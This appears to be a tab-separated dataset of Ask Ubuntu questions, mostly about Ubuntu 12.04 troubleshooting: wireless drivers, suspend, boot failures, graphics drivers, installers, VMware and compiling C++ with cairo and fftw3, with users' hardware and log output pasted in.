177185	computer automatically resumes after suspend in 12.04	when i click on 'suspend ' in 12.04 , my computer does not 'suspend ' . it just automatically resumes from the suspend and then returns to the password prompted lock screen . information about my computer : kernel : linux 3.2.0-29-generic i686 distro : ubuntu 12.04.1 lts cpu : amd athlon ( tm ) 64 x2 dual core processor 4800+ 2 cores/threads 2511.546 mhz ram : 1.96 gib gpu : geforce 8400 gs/pcie/sse2/3dnow ! opengl 3.3.0 nvidia 295.40 glsl 3.30 nvidia via cg compiler
177186	invalid command name `` bind '' - when installing	i want to install red suite 4 ( search on google shows this problem is with installing other apps too ) on my 64bit machine . i have installed the prerequisite packages : linux32 and ia32-libs ( for 32bit support ) . when i try to install the app i get this error : sudo ./installer_red_suite_4_4.2.3_255_linux-x86 invalid command name `` bind '' while executing `` : :unknown bind text < tab > '' ( `` uplevel '' body line 1 ) invoked from within `` uplevel 1 $ next $ args '' ( procedure `` : :obj : :unknown '' line 3 ) invoked from within `` bind text < tab > '' ( procedure `` : :installjammer : :initializegui '' line 19 ) invoked from within `` : :installjammer : :initializegui `` ( procedure `` : :installjammer : :initinstall '' line 68 ) invoked from within `` : :installjammer : :initinstall '' ( file `` /installkitvfs/main.tcl '' line 37049 ) i 've googled - installjammer is `` multiplatform gui installer '' . what could be wrong - bind is bash command so i do n't know what 's wrong .
177188	sony vaio wlan problem using 12.04	i 'm unable to get my wlan to work for my sony vaio model vpcf23c5e no problem connecting from windows , smartphones etc . $ sudo lshw -c network ; lsb_release -a ; uname -a ; sudo rfkill list ; dmesg | grep -i firm *-network description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 64:27:37:92:99:0f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-29-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : f7000000-f707ffff memory : f7080000-f708ffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 06 serial : f0 : bf:97 : dd : b2 : bd size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-1.fw ip=192.168.1.4 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:50 ioport:9000 ( size=256 ) memory : e2104000-e2104fff memory : e2100000-e2103fff lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise linux siriedit 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no [ 1.287449 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 18.273582 ] [ firmware bug ] : acpi ( ngfx ) defines _dod but not _dos seen some proposed solution e.g . wireless network can not be enabled for sony vaio e series but answers there do n't solve my problem ... i 'm out of ideas : - ( what else can i check ? update $ ifconfig -a eth0 link encap : ethernet hwaddr f0 : bf:97 : dd : b2 : bd inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :f2bf:97ff : fedd : b2bd/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5072 errors:0 dropped:0 overruns:0 frame:0 tx packets:4444 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4568435 ( 4.5 mb ) tx bytes:610624 ( 610.6 kb ) interrupt:50 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1498 errors:0 dropped:0 overruns:0 frame:0 tx packets:1498 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:114156 ( 114.1 kb ) tx bytes:114156 ( 114.1 kb ) wlan0 link encap : ethernet hwaddr 64:27:37:92:99:0f inet addr:192.168.1.5 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :6627:37ff : fe92:990f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1277 errors:0 dropped:0 overruns:0 frame:0 tx packets:472 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:483155 ( 483.1 kb ) tx bytes:61031 ( 61.0 kb )
177190	wunderlist not execuring on ubuntu 12.04 64bit	i am having some trouble with wunderlist in ubuntu 12.04 64bit . i followed the instructions on http : //www.webupd8.org/2012/01/how-to-install-wunderlist-in-ubuntu.html and http : //support.wunderlist.com/customer/portal/questions/63885-ubuntu-11-1-installation- ? new=63885 it seemed to have installed on my system , the icon is available in my menu . however when i click to run the app it does nothing . when i try to run the app through terminal with /opt/wunderlist-1.2.4/wunderlist i get this response /opt/wunderlist-1.2.4/wunderlist : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory and that is where the files where installed in , unless i am doing it wrong ?
177191	how can i make my ubuntu 12.04 act like an external usb hard drive ?	quick breakdown , i have a roku 2 xs that has a usb port that you can connect a flash drive or external hard drive to . i also have a box running ubuntu that is the household media storage center . i would like to be able to connect the two directly , and the best way looks like having the ubuntu box pretend to be an external hdd . is there a way to do it via software and a direct usb connection , or even through a parallel-to-usb , or something along those lines ?
177192	how do i create a 32-bit wine prefix ?	how do i create a 32-bit wine prefix on ubuntu 12.04 64-bit ?
177194	wo n't boot after installing ubuntu 12.04 sucessfully	i installed 12.04 successfully and rebooted ( i took out my installation cd ) , and selected the newly installed linux partition to boot from refit . then it just comes up with this error message : error loading operating system which could not be more vague . take that back . i guess it could say just `` error . '' i do n't even get to the boot prompt which limits what i can do . i can not boot into rescue mode . i tried boot-repair , but it took more than 24 hours to check the system configuration , so i gave up on that . i 'm running a mac mini with its main os being mac os x 10.5.8 . i have an alternate os windows xp installed , which was virtually destroyed by this linux installation . i sacrificed my working , speedy windows partition for something that wo n't even boot up . what was i thinking . my mac partition is slow as crap . i 've tried installing 12.04 many times with two different disks . the first time , i had one partition for linux , then i had 2 ( swap+main ) , then 3 ( swap , main and bios ) , then 4 which is what i have now ( swap , main , bios , and boot/grub ) . the only way i could get through the install without grub giving up was if i created a separate partition for it . which was pointless , because it did install successfully , but it still does n't boot up at all . could refit be booting off of the bios or one of the other partitions ? because if that 's the case , there is no alternative , because mac itself without refit refuses to recognize a linux ext4 ( or 2 or 3 ) format partition . apple always has to make everything so difficult . if i 'm not mistaken , refit is the only application of its kind for mac . i can boot off of the cd back to the install/try screen . this is extremely upsetting , can you guys help ? please ?
177195	apparmor-notify exclude application	is there a way to exclude certain applications from apparmor-notify notifications . e.g . i do n't want to receive any apparmor notifications from firefox but i 'd like to receive notifications about the other applications .
177196	triple boot windows 7/ windows 8 rtm/ ubuntu	what is the best way to triple boot windows 7 home premium , windows 8 professional rtm , and the latest version of ubuntu ? i already have windows 7 and windows 8 installed . i am currently downloading ubuntu . i do n't want to lose either of my os 's . thanks for any help . : )
177199	why am i stuck in unity 2d and how do i fix it ?	okay , so i recently installed ubuntu 12.04lts , and at first , unity 3d worked fine . the launcher was transparent , the bar at the top had the shadow , and everything looked really neat . i do n't remember why , but for some reason , when i logged in , i clicked on the ubuntu symbol and chose ubuntu 2d , and it looked horrible . i hated it , compared to unity 3d . but i ca n't get back into 3d anymore . no matter what i do , i 'm always running unity 2d , even if i click on the ubuntu symbol and select `` ubuntu '' . why am i stuck in unity 2d even though i keep selecting the 3d one , and how do i fix that ? if it 's worth anything , i 'm using an nvidia gt440 , with the proprietary drivers , version 303 or really close to that .
177202	why are n't file properties shown for mp4 files ?	i am using ubuntu 12.04 . i have a .mp4 video for which i want to change default media player to vlc . when i try to go to properties by right clicking on that video . i get the following message . how to overcome this . output of mediainfo filename.mp4 general complete name : interview with mit physics professor walter lewin.mp4 format : mpeg-4 format profile : base media / version 2 codec id : mp42 file size : 10.7 mib duration : 3mn 41s overall bit rate mode : variable overall bit rate : 407 kbps encoded date : utc 2008-10-16 15:15:29 tagged date : utc 2008-10-16 15:15:29 gsst : 0 gstd : 221656 gssd : b4a7d0a24hh1345230487367165 gshh : o-o -- -preferred -- -hkg05s03 -- -v14 -- -lscache4.c.youtube.com video id : 2 format : avc format/info : advanced video codec format profile : baseline @ l1.1 format settings , cabac : no format settings , reframes : 1 frame codec id : avc1 codec id/info : advanced video coding duration : 3mn 41s bit rate : 280 kbps maximum bit rate : 997 kbps width : 352 pixels height : 288 pixels display aspect ratio : 1.222 frame rate mode : constant frame rate : 29.970 fps standard : pal color space : yuv chroma subsampling : 4:2:0 bit depth : 8 bits scan type : progressive bits/ ( pixel*frame ) : 0.092 stream size : 7.37 mib ( 69 % ) title : ( c ) 2007 google inc. v08.13.2007 . encoded date : utc 2008-10-16 15:15:29 tagged date : utc 2008-10-16 15:15:29 audio id : 1 format : aac format/info : advanced audio codec format profile : lc codec id : 40 duration : 3mn 41s bit rate mode : variable bit rate : 125 kbps maximum bit rate : 280 kbps channel ( s ) : 2 channels channel positions : front : l r sampling rate : 44.1 khz compression mode : lossy stream size : 3.30 mib ( 31 % ) title : ( c ) 2007 google inc. v08.13.2007 . encoded date : utc 2008-10-16 15:15:29 tagged date : utc 2008-10-16 15:15:29
177207	is chromium in ubuntu 's repository safe to use since it 's so out of date ?	is ubuntu chromium still safe to use since its so out of date ?
177209	why is only one cpu detected on a macbook with a dual-core processor ?	i have a january , 2009 macbook5,2 . it has an intel core 2 duo 2ghz processor . since installing xubuntu 12.04 , it runs very slowly . the cpu gadget in the top panel shows only 1 dark column to the left of the graph ( apparently 1 per cpu/core , as my desktop machine appropriately shows 4 columns ) . `` i could swear '' ( though i ca n't prove it now ) , that when i had 11.10 installed the machine was faster and the cpu gadget showed 2 columns . the dmesg output ( see below ) complains `` cpu 1 not responding '' . edit : complete dmesg output is at http : //pastebin.com/meg4kvk3 if i boot osx , a similar utility ( istat menus ) shows both cpus active , so i assume the hardware is not to blame . how can i get xubuntu to use both cores ? 179 : [ 0.070855 ] cpu0 : intel ( r ) core ( tm ) 2 duo cpu p7350 @ 2.00ghz stepping 0a 180- [ 0.072003 ] performance events : pebs fmt0+ , core2 events , intel pmu driver . -- 189- [ 0.072003 ] booting node 0 , processors # 1 ok. 190 : [ 0.072003 ] smpboot cpu 1 : start_ip = 9a000 191 : [ 5.260093 ] cpu1 : not responding . 192 : [ 5.260158 ] brought up 1 cpus 193- [ 5.260163 ] total of 1 processors activated ( 3979.99 bogomips ) .
177216	ubuntu 12.04 installation driver issue	i 'm almost certain i 'm experiencing a driver issue , but i 'm trying to install ubuntu 12.04 alongside windows 7 ( never installed ubuntu on this machine before ) , and initially when i boot from the cd , i select `` install ubuntu '' from grub , which then brings me to a purple screen ( which sort of pulses ) , followed by a tan-ish screen ( doing the same thing ) . finally , i reach a gray screen at about 10 pixels ' height of what appears should be drawn , going across the top of my screen . like so ( if anything could actually be made out ... ) : i 'm fairly certain this would be a graphic 's card driver issue . throughout this process , i never actually see any ubuntu-related images/screens except for solid colors . my system build is as follows : ga-z77-ds3h lga 1155 z77 atx intel motherboard core i5 2500k lga 1155 boxed processor xfx hd-687a-zhfc radeon hd 6870 edit : following trailrider 's comment , i followed the steps here and was able to successfully show the install screen . in particular , at the grub select screen , i had to edit the boot options from there for nomodeset .
177217	facebook fogger app not working	i have tried to install the facebook app on both my laptop and desktop running on ubuntu 12.04 . it downloads and installs just fine on both , but when i click on the icon it does n't do anything . i installed per the instructions found here : facebook app installation instructions
177219	how can i halt juju and remove it from my local machine ?	i have juju running locally using lxc , and i 'd like to completely remove it . is removing the juju package enough , or do i need to go hunt down other things as well ?
177221	how do i get a bcm4311 wireless card working without an internet connection ?	i 'm a first time user of linux , i got the blue screen of death one to many times on an old laptop , a dell d620 , so i went for 12.04 and removed windows , but now i ca n't get online at all . we all use a huawei e5830 wi-fi as our only internet access , but my wireless card wo n't work now with ubuntu , is there a way to install the huawei w5830 and connect through usb as with windows ? how can i get my wireless card to work ? i also have a huawei e1550 dongle that i ca n't get to work , i am looking for the easiest way to get back online , i am a noob at this , but really want to learn and do n't want to go back to windows . if anybody can help me it would be amazing . the card is broadcom corporation bcm4311 .
177226	duplicated menu , panel indicators and taskbar	ubuntu 12.04 . the first time i log into gnome classic i get a duplicate of every menu , panel indicator and taskbar entry . if i log out and back in again i now have three copies . log out and log in , four copies and so forth . what would cause this ? i ca n't see any obvious duplicates in the process list : $ ps -a | grep 'gno\|org\|nau' 27439 tty7 00:00:18 xorg 27610 ? 00:00:00 gnome-keyring-d 27621 ? 00:00:00 gnome-session 27674 ? 00:00:00 gnome-settings- 27709 ? 00:00:07 gnome-panel 27720 ? 00:00:00 gnome-fallback- 27726 ? 00:00:04 nautilus 27736 ? 00:00:00 polkit-gnome-au 28281 ? 00:00:00 gnome-screensav 29016 ? 00:00:00 gnome-terminal 29021 ? 00:00:00 gnome-pty-helpe if it helps , i was recently trying the nouveau drivers but have now reverted to nvidia . configuration is separate x window , xinerama enabled . unity is fine , so the problem is limited to the classic desktop . i have n't had any luck googling these particular symptoms so any tips would be really appreciated . thanks !
177227	laptop almost freezes when try to dim screen ( nvidia optimus )	i just got a samsung np300e5a notebook with nvidia optimus . following other answers , i installed bumblebee and after some troubleshooting ( followed https : //github.com/bumblebee-project/bumblebee/issues/220 ) i finally get this : desktop : ~ $ glxinfo | grep opengl opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 3.0 mesa 8.0.2 opengl shading language version string : 1.30 opengl extensions : desktop : ~ $ optirun glxinfo | grep opengl opengl vendor string : nvidia corporation opengl renderer string : geforce gt 520mx/pcie/sse2 opengl version string : 4.2.0 nvidia 304.37 opengl shading language version string : 4.20 nvidia via cg compiler opengl extensions : optirun glxspheres polygons in scene : 62464 visual id of window : 0x21 context is direct opengl renderer : geforce gt 520mx/pcie/sse2 it seems ok then , but if i try to dim the screen ( or if i go on batteries and it tries to do so automatically ) it does n't seem to be able to do it and almost freezes ( eats up so much cpu that i can not even shutdown properly ) . in another forum i saw somebody with the same problem and no help ( https : //answers.launchpad.net/ubuntu/+source/xserver-xorg-video-nv/+question/205823 ) update : following this ( http : //ubuntucomputing.blogspot.com.br/2011/10/how-to-fix-adjust-screen-backlight-of.html # comment-form ) i improved it a litle by editing /etc/default/grub for grub_cmdline_linux_default= '' splash acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_backlight=vendor '' and runing 'update-grub ' . however , now i can dim the screen but i can not get it all the way up again ! . is it perhaps related to something different than bumblebee ? ( i do not know ) any idea please please ?
177229	use image as video stream ?	i want to use an image as a video stream source in flashplayer , for websites like ustream . preferably something light on memory/cpu . from what i 've read , xawtv might be able to create a fake vloopback source from a picture ? thoughts on how to accomplish this ? ps . i know about ws4l , but it is very resource heavy for this simple purpose .
177236	how can i install a driver for an intel 82573 gigabit ethernet card ?	i recently installed ubuntu 12.04 on my computer , the only problem so far is there is no internet connection . i believe that 's due to missing drivers which are difficult to install without internet . so i am hoping some one can help me find the drivers i need and give me some tips on installing the drivers . the motherboard is an intel速 d975xbx2 and the ethernet is a intel速 82573e/82573l gigabit ethernet controller i tried installing the linux drivers from here . except when i tried to run rpmbuild , like i was told to do in the readme it said it was n't installed .
177251	can i test the physical memory of a vps or virtual machine ?	is there a memory test program i can run on an online vps hosted instance ? since it is a vps i do n't have access to the console or the memtest grub option . i am troubleshooting random crashes ( with no logging ) and need to rule out memory issues .
177256	isolinux.bin missing or corrupt on sdhc with kodak adapter	when booting from amd64 desktop 12.04 iso ( i did check the md5 ) , i get the isolinux.bin missing or corrupt . error of doom . additionally , when ( auto ) mounting on mac os x snow leopard , i get an error that says the disk you inserted was not readable by this computer . i get initialize ... , which brings up disk utility to format it , ignore , and eject . i burned it on the mac using the directions for a usb drive . i 'm writing from a late 2009 macbook running 10.6.8 os x , and booting on a toshiba portege z835-p330 . the card is a kingston microsdhc 4gb , using a : kingston microsd ( hc ) = > sd ( hc ) adapter , and then a kodak sd ( hc ) = > usb 2.0 reader .
177257	why does my imac boot to a black screen when trying to install 12.04 ?	i have an imac and when i boot from the ubuntu 12.04 cd it switches to the display port and my 27in display goes black . i have read some solutions and all of which might work . i tried nomodeset ( with f6 and in the boot command ) . however does anybody know of a way to just install the command line system and then update my drivers with the ati drivers and then start building my gui or not ?
177261	ubuntu wireless problem	i have just installed the latest version of ubuntu on my toshiba l655 . i have never used linux before this , so i do not know much about it . when i try to connect to my hidden wireless network , i put the password encryption as wpa/wpa2 psk personal and put my password in . it tries to connect to it for 30 seconds to one minute then i get a window that pops up saying something along the lines of ( not looking at it , laptop is off charging ) `` this network requires password or encryption code authorization '' . i put the same password in that i set it to origionally . it begins doing its thing again trying to connect and a few seconds later it pops up again , and again , and again . i do not have any encryption codes or other passwords etc . what should i do ? thanks , any suggestions will really help !
177265	ubuntu 12.04 freezing upon cd/dvd installation at `` installing system ''	first off , i have a very old computer . i feel it necessary to point out that it has a pentium 4 processor , i believe 768 mb of ram , and about 30 gb total on the hard drive . now , onto my predicament ... i was recently running windows xp on my computer . it kept having some issues , so i tried ubuntu 12.04 32 bit . i put in the cd/dvd , and the installation was working fine until it got to `` installing system '' . it froze there for about 3-3 1/2 hours . i figured something must 've been wrong , because a computer could n't be that slow . i then took out the cd/dvd and tried again . the same exact thing happened ; froze at `` installing system '' . could this be an issue with my computer ? i did some research and read that others have managed to run it on a celeron processor ( which is older than a pentium ) . others have also said that a computer similar to mine could run ubuntu 12.04 quite smoothly . please help , trevis/twistedstar ps . this is the output of lshw ubuntu description : desktop computer product : 8753-8233 vendor : via technologies , inc. width : 32 bits capabilities : smbios-2.2 dmi-2.2 configuration : boot=normal chassis=desktop *-core description : motherboard product : viap4xb vendor : via technologies , inc. physical id : 0 *-firmware:0 description : bios vendor : award software international , inc. physical id : 0 version : 6.00 pg date : 05/24/2002 size : 128kib capacity : 192kib capabilities : isa pci pnp apm upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb agp ls120boot zipboot biosbootspecification *-cpu description : cpu product : intel ( r ) pentium ( r ) 4 cpu 1.60ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 15.2.4 slot : socket 478 size : 1600mhz capacity : 4ghz width : 32 bits clock : 100mhz capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm up pebs bts configuration : id=0 *-cache:0 description : l1 cache physical id : 9 slot : internal cache size : 8kib capacity : 16kib capabilities : synchronous internal write-back *-cache:1 description : l2 cache physical id : 0 size : 512kib *-firmware:1 description : bios physical id : 516 size : 1003kib capacity : 1mib *-memory description : system memory physical id : 1d slot : system board or motherboard size : 768mib *-bank:0 description : dimm physical id : 0 slot : a0 size : 256mib *-bank:1 description : dimm physical id : 1 slot : a1 size : 256mib *-bank:2 description : dimm physical id : 2 slot : a2 size : 256mib *-pci description : host bridge product : vt8753 [ p4x266 agp ] vendor : via technologies , inc. physical id : 100 bus info : pci @ 0000:00:00.0 version : 01 width : 32 bits clock : 33mhz configuration : driver=agpgart-via resources : irq:0 memory : c0000000-cfffffff *-pci description : pci bridge product : vt8633 [ apollo pro266 agp ] vendor : via technologies , inc. physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 66mhz capabilities : pci pm normal_decode bus_master cap_list resources : ioport:9000 ( size=4096 ) memory : d8000000-d9ffffff memory : d0000000-d7ffffff *-display description : vga compatible controller product : rv100 qy [ radeon 7000/ve ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 66mhz capabilities : agp agp-2.0 pm vga_controller bus_master vga_palette cap_list rom configuration : driver=radeon latency=64 mingnt=8 resources : irq:11 memory : d0000000-d7ffffff ioport:9000 ( size=256 ) memory : d9000000-d900ffff memory : d8000000-d801ffff *-network description : ethernet interface product : 3c905b 100basetx [ cyclone ] vendor : 3com corporation physical id : 7 bus info : pci @ 0000:00:07.0 logical name : eth0 version : 30 serial : 00:10:5a : e3 : e6 : ea size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=3c59x duplex=half latency=32 link=no maxlatency=10 mingnt=10 multicast=yes port=mii speed=10mbit/s resources : irq:12 ioport : a000 ( size=128 ) memory : db000000-db00007f memory:30000000-3001ffff *-isa description : isa bridge product : vt8233 pci to isa bridge vendor : via technologies , inc. physical id : 11 bus info : pci @ 0000:00:11.0 version : 00 width : 32 bits clock : 33mhz capabilities : isa pm bus_master cap_list configuration : latency=0 *-ide description : ide interface product : vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide vendor : via technologies , inc. physical id : 11.1 bus info : pci @ 0000:00:11.1 logical name : scsi0 logical name : scsi1 version : 06 width : 32 bits clock : 33mhz capabilities : ide pm bus_master cap_list emulated configuration : driver=pata_via latency=32 resources : irq:0 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : a400 ( size=16 ) *-disk:0 description : ata disk product : wdc wd300ab-00bv vendor : western digital physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 21.0 serial : wd-wma7h1262427 size : 27gib ( 30gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00035ef6 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 1.0 serial : 5261f911-4f11-450f-b7bc-d52b8f349eb1 size : 27gib capacity : 27gib capabilities : primary journaled extended_attributes large_files huge_files dir_nlink extents ext4 ext2 initialized configuration : created=2012-08-18 04:30:06 filesystem=ext4 lastmountpoint=/target modified=2012-08-18 04:30:12 mounted=2012-08-18 04:30:12 state=clean *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 765mib capacity : 765mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 765mib capabilities : nofs *-disk:1 description : scsi disk product : zip 100 vendor : iomega physical id : 1 bus info : scsi @ 0:0.1.0 logical name : /dev/sdb version : 14.a capabilities : removable configuration : ansiversion=5 *-medium physical id : 0 logical name : /dev/sdb *-cdrom:0 description : dvd writer product : dvd rw dru-530a vendor : sony physical id : 2 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 2.1g serial : 3 capabilities : removable audio cd-r cd-rw dvd dvd-r configuration : ansiversion=5 status=nodisc *-cdrom:1 description : dvd reader product : cd-rw crx320e vendor : sony physical id : 3 bus info : scsi @ 1:0.1.0 logical name : /dev/cdrom1 logical name : /dev/cdrw1 logical name : /dev/dvd1 logical name : /dev/sr1 logical name : /cdrom version : nyk5 capabilities : removable audio cd-r cd-rw dvd configuration : ansiversion=5 mount.fstype=iso9660 mount.options=ro , noatime state=mounted status=ready *-medium physical id : 0 logical name : /dev/cdrom1 logical name : /cdrom capabilities : partitioned partitioned : dos configuration : mount.fstype=iso9660 mount.options=ro , noatime signature=66b94095 state=mounted *-volume unclaimed description : hidden hpfs/ntfs partition physical id : 1 capacity : 701mib capabilities : primary bootable hidden *-usb:0 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 11.2 bus info : pci @ 0000:00:11.2 version : 1b width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=32 resources : irq:12 ioport : a800 ( size=32 ) *-usb:1 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 11.3 bus info : pci @ 0000:00:11.3 version : 1b width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=32 resources : irq:12 ioport : ac00 ( size=32 ) *-usb:2 description : usb controller product : vt82xxxxx uhci usb 1.1 controller vendor : via technologies , inc. physical id : 11.4 bus info : pci @ 0000:00:11.4 version : 1b width : 32 bits clock : 33mhz capabilities : pm uhci bus_master cap_list configuration : driver=uhci_hcd latency=32 resources : irq:12 ioport : b000 ( size=32 ) *-multimedia description : multimedia audio controller product : vt8233/a/8235/8237 ac97 audio controller vendor : via technologies , inc. physical id : 11.5 bus info : pci @ 0000:00:11.5 version : 30 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : driver=snd_via82xx latency=0 resources : irq:5 ioport : b400 ( size=256 ) *-network description : wireless interface physical id : 1 bus info : usb @ 3:2 logical name : wlan0 serial : 00:13:46:63:3e : f8 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2500usb driverversion=3.2.0-23-generic-pae firmware=n/a ip=10.0.0.4 link=yes multicast=yes wireless=ieee 802.11bg
177268	installing ubuntu 12.04 or 12.10 inside vmware	i 'm installing ubuntu 12.04 inside vmware workstation 8 . once installing the tools started , it got stuck with a message saying : installing vmware tools . please wait ... how do i get it to boot ? i have left it sitting for at least half an hour before restarting it . this was originally asked re . 12.04 . i am having the same problem with 12.10 . i suspect it 's some interaction between vmware and my corporate firewall , but i have n't solved it yet .
177269	why am i getting errors today when updating oneiric ppas ?	when i update software from terminal with sudo apt-get update almost always do n't shown errors but this time is different . what i think is that most of the ppa pages has been modified . i.e . when the update want to find a source goes to ppa.launchpad.net/ ... /inrelease but it tells me that is impossible , so if i open the url and it shows me not found but if i go to the previously directory ( of the server ) i see a release file . this does n't happens to one program but all the ppa there i added to my source list . i do n't know if its problem of my system or configuration , some changes made to the own ppa 's website or what . what i should do ? modify the path from ... /inrelease to ... /release remove this ppa from the source list the complete output errors here .
177273	installing ubuntu ( any distro ) onto a imac g4	i recently received a imac g4 with no os , so instead of buying osx i though 'why not try ubuntu ' . i have it running om my laptop right now so i know how to install ubuntu in principle . however , when i put in a brand new hard drive it would not load the installation cd ( it is the ppc ) . so i got my junk old windows pc and installed ubuntu 12.04 just fine until i put it back into the imac . in there it is just showing me the finder icon and question mark . even though the ubuntu was tested and works just fine .
177275	can ubuntu one be used to deploy a cloud ?	i 'm new to ubuntu operating system and just want to know whether ubuntu one can be used as a cloud machine ( eg.deploying on cloud machine , testing on cloud , etc ) or it 's just a file storage space given .
177277	compiling c++ in ubuntu ( psa - point set analysis )	i 'm new in ubuntu and trying to compile a c++ code on it . the code uses 2 dependencies ( cairographics and fftw3 ) . i have installed both of them using ./configure , make and make install in directory $ home/prefix/ ( following the instruction given here how to install cairo 1.8.10 ) now i have in this directory 4 folders , namely bin , include , lib and share the make file of the code requires specifying the dependencies ' directory . like that inc : = -i $ home/prefic/include lib : = -l $ home/prefic/lib when i compile the code , i set the environment variables as export pkg_config_path= $ home/prefic/lib/pkgconfig export ld_library_path= $ home/prefic/lib and then use make . linker gives `` undefined reference to '' functions from inside cairo or fftw the make file i use # # # # # # # # # # # # # # # # # # # # # # user-configuration section # # # # # # # # # # # # # # # # # # # # # # # inc : = -i/opt/local/include lib : = -l/opt/local/lib # 32 bit # march : = -m32 # 64 bit march : = -m64 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # cxx : = g++ cxxflags : = -wall -fopenmp optflags : = -o3 $ ( march ) lib += -lfftw3 -lm -lcairo cxxfiles : = main.cpp fileio.cpp measurements.cpp spectralanalysis.cpp objs : = $ ( patsubst % .cpp , % .o , $ ( cxxfiles ) ) target : = psa .phony : all clean cleanall rebuild all : $ ( target ) $ ( target ) : $ ( objs ) @ $ ( cxx ) $ ( cxxflags ) $ ( optflags ) -o $ ( target ) $ ( lib ) $ ( objs ) % .o : % .cpp @ $ ( cxx ) $ ( cxxflags ) $ ( optflags ) $ ( inc ) -o $ @ -c $ < clean : rm -rf *.o cleanall : clean rm -rf $ ( target ) rebuild : $ ( make ) cleanall $ ( make ) all i think i do n't link the code with the dependencies correctly . could someone help please . the psa code i 'm trying to compile is here http : //code.google.com/p/psa/downloads/list
177281	how do i clear a log file that is currently in use ?	i 'm trying to clear a log file in use , and all the commands i 've tried so far : truncate less tail filename do n't get the job done . deleting the file and creating a new file with the same name does n't work either . i heard about a config-file for the log but i have no idea where this is kept . is there any way to fix this problem ? this log file will get so big it 'll crash my system .
